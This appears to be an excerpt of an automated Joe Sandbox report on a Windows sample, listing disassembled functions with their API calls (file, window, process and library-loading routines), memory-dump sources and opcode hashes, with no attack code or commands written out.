Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd

Similarity

API ID: Global$AllocFreelstrcatlstrlen
String ID: open
API String ID: 3292104215-2758837156
Opcode ID: 416e0808797b3da9c1fece3e967c8094de08963848feecb337ecbf82cdc503c9
Instruction ID: e925a152a6e0f7021576dd296752ea90fe74f89098b2d6bde03e837448aacd47
Opcode Fuzzy Hash: 416e0808797b3da9c1fece3e967c8094de08963848feecb337ecbf82cdc503c9
Instruction Fuzzy Hash: BA213673904210EBD720AFA4DEC5E5E72A4EB08328715093BF552B72D1D6BCE8518B5D

Uniqueness

Uniqueness Score: -1.00%

Function 00401F12 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 54COMMON

Download Yara Rule

APIs

Part of subcall function 00405B2D: ShellExecuteExW.SHELL32(?), ref: 00405B3C

Part of subcall function 0040697F: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406990
Part of subcall function 0040697F: GetExitCodeProcess.KERNELBASE(?,?), ref: 004069B2

CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FEB

Strings

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache, xrefs: 00401F6A
@, xrefs: 00401F8A

Memory Dump Source

Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd

Similarity

API ID: CloseCodeExecuteExitHandleObjectProcessShellSingleWait
String ID: @$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache
API String ID: 165873841-1134175212
Opcode ID: 1f5917e33a56c947b6e5a947a7c5c6b6bc43c16b3be91fb6cacf00c248c14470
Instruction ID: e5fb9d027c761589e680b1257b4cadef509076267ccb1bc0e8fa647dfd1f3a7d
Opcode Fuzzy Hash: 1f5917e33a56c947b6e5a947a7c5c6b6bc43c16b3be91fb6cacf00c248c14470
Instruction Fuzzy Hash: 9C114971E042189ACB60EFB9CA49B8CB6F4AF08304F20457AE405F72D1EBBC89459B18

Uniqueness

Uniqueness Score: -1.00%

Function 0040697F Relevance: 4.5, APIs: 3, Instructions: 27synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,00000064), ref: 00406990
WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 004069A5
GetExitCodeProcess.KERNELBASE(?,?), ref: 004069B2

Memory Dump Source

Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd

Similarity

API ID: ObjectSingleWait$CodeExitProcess
String ID:
API String ID: 2567322000-0
Opcode ID: b4e22deffd65f84e370c04cbd1d88a1e749a9585608b68ea3518500749b930bb
Instruction ID: 36eed24e95c07865df7b56cd3c3a37613c402ee52c1e894a6bace4c6932a2b17
Opcode Fuzzy Hash: b4e22deffd65f84e370c04cbd1d88a1e749a9585608b68ea3518500749b930bb
Instruction Fuzzy Hash: 25E0D8B1600508FBDF109B55DD06E9E7B6EDB84700F110037F601B61A0C7B6AE61DBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 970bce7bfd6110042ba11e2ba34b1580a3262637bb8a43ad7db674ac8d0d0c57
Instruction ID: 40daf909c284af41af5c9cdf7f458e0296b91398e9c9917f7ae767538e8fd086
Opcode Fuzzy Hash: 970bce7bfd6110042ba11e2ba34b1580a3262637bb8a43ad7db674ac8d0d0c57
Instruction Fuzzy Hash: 1A01D131724220EBEB194B389D09B2A3698E710318F10867AF855F66F1E6788C129B5C

Uniqueness

Uniqueness Score: -1.00%

Function 00401EDE Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 00401EFC
EnableWindow.USER32(00000000,00000000), ref: 00401F07

Memory Dump Source

Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: dc987a2418bededafa9039ccbb786b59f9cf8f416ed8c99e1cda5871faa3231f
Instruction ID: 5d3c5223d4adea09edd48fe2ddafa99b3fbee87e2958761c9001e4fb32d1ad87
Opcode Fuzzy Hash: dc987a2418bededafa9039ccbb786b59f9cf8f416ed8c99e1cda5871faa3231f
Instruction Fuzzy Hash: C3E0D872908201CFE705EBA4EE485AE73F4EF40315710097FE401F11D1DBB54C00866D

Uniqueness

Uniqueness Score: -1.00%

Function 004068D4 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,00403607,0000000B), ref: 004068E6
GetProcAddress.KERNEL32(00000000,?), ref: 00406901

Part of subcall function 00406864: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040687B
Part of subcall function 00406864: wsprintfW.USER32 ref: 004068B6
Part of subcall function 00406864: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004068CA

Memory Dump Source

Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 6f78d3fdf53352f122fdb8e7e1f438bdfac4fae158339a91a146711bf240c1a4
Instruction ID: b54d22b37b479e59566a9631c032e51b8c6cd741f5ea0e4d018af200ac078f8b
Opcode Fuzzy Hash: 6f78d3fdf53352f122fdb8e7e1f438bdfac4fae158339a91a146711bf240c1a4
Instruction Fuzzy Hash: 48E086335042109AE21197715D44C7B73A8AF89650307443EF947F2080DB38DC31A669

Uniqueness

Uniqueness Score: -1.00%

Function 00405FF7 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,004030BD,00438800,80000000,00000003,?,?,?,?,?,00403847,?), ref: 00405FFB
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,00403847,?), ref: 0040601D

Memory Dump Source

Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15

Uniqueness

Uniqueness Score: -1.00%

Function 00405FD2 Relevance: 3.0, APIs: 2, Instructions: 13COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,00405BD7,?,?,00000000,00405DAD,?,?,?,?), ref: 00405FD7
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405FEB

Memory Dump Source

Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
Instruction ID: 846b50f6ec280e5947384c74444241e6b9796591039fc91e932c01759f2cc32f
Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
Instruction Fuzzy Hash: 2CD0C972504531ABC2102728EE0889BBB55EF642717054A35FAA5A22B0CB304C529E98

Uniqueness

Uniqueness Score: -1.00%

Function 00405AB5 Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,00000000,004034EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00405ABB
GetLastError.KERNEL32 ref: 00405AC9

Memory Dump Source

Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
Instruction ID: 81e7360d8487983dd45b28c0c59a41c1d83062ba9acea414cf4290cf05fa9266
Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
Instruction Fuzzy Hash: C3C04C30314601AED7505B609E48B177EA19B94741F1A85396146E41A4DA389455DD2D

Uniqueness

Uniqueness Score: -1.00%

Function 0040607A Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034AC,00000000,00000000,00403303,000000FF,00000004,00000000,00000000,00000000), ref: 0040608E

Memory Dump Source

Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
Instruction ID: c8e4d841af9964a9af1d27d101842a5e1860e0780d1899a5c61b78fe641b59a9
Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
Instruction Fuzzy Hash: 84E08632140219ABCF10EE518C00EEB379CFF01390F054432F911E2140D638E92187A4

Uniqueness

Uniqueness Score: -1.00%

Function 004060A9 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,0040347A,00000000,00414EC0,?,00414EC0,?,000000FF,00000004,00000000), ref: 004060BD

Memory Dump Source

Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction ID: 36c6d552b97af02dd58307b05a598db1695570393df740455f8c701413f3969e
Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction Fuzzy Hash: AFE0E632150169ABDF10DE559C00EEB775CEB05351F014476F955E3150DA31E87197A5

Uniqueness

Uniqueness Score: -1.00%

Function 004044AF Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044C1

Memory Dump Source

Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 74117c3da1d14bbcbc4f92c0e0eb3ebd0fff66770c46117da5e433d52de2638c
Instruction ID: 22c14ff0de7d99e8655fd7423acc63eaa31bea8074cc9abcc6b2c74ee929f0f7
Opcode Fuzzy Hash: 74117c3da1d14bbcbc4f92c0e0eb3ebd0fff66770c46117da5e433d52de2638c
Instruction Fuzzy Hash: 54C09B71740706BBEE608F519D49F1777586750700F298579B755F60D0C674E410DA1C

Uniqueness

Uniqueness Score: -1.00%

Function 00405B2D Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(?), ref: 00405B3C

Memory Dump Source

Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd

Similarity

API ID: ExecuteShell
String ID:
API String ID: 587946157-0
Opcode ID: 34af207f7f04f37b2a6a243a8c8041682423b78b35e6f682d2e1a111f695392f
Instruction ID: 155326c85e208380d9db810c36285a9e1b4200be200639c8195ffcf147e959ee
Opcode Fuzzy Hash: 34af207f7f04f37b2a6a243a8c8041682423b78b35e6f682d2e1a111f695392f
Instruction Fuzzy Hash: BEC092B2000200EFE301CF80CB09F067BE8AF54306F028068E185DA060C7788840CB29

Uniqueness

Uniqueness Score: -1.00%

Function 00404498 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,004042C3), ref: 004044A6

Memory Dump Source

Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 3ca17ea631bf80887aa3d9427a31a3d2622a0e2ccdc50664b5f44c823975825e
Instruction ID: a70792fcf8e9dbddb4bc54a752e2f47ec30058e0f009e109d264f56951a5bac9
Opcode Fuzzy Hash: 3ca17ea631bf80887aa3d9427a31a3d2622a0e2ccdc50664b5f44c823975825e
Instruction Fuzzy Hash: 28B09236281A00EBDE614B00EE09F457A62A768701F008468B641240B0CAB240A5DB19

Uniqueness

Uniqueness Score: -1.00%

Function 004034AF Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403242,?,?,?,?,?,?,00403847,?), ref: 004034BD

Memory Dump Source

Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D

Uniqueness

Uniqueness Score: -1.00%

Function 00404485 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,0040425C), ref: 0040448F

Memory Dump Source

Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
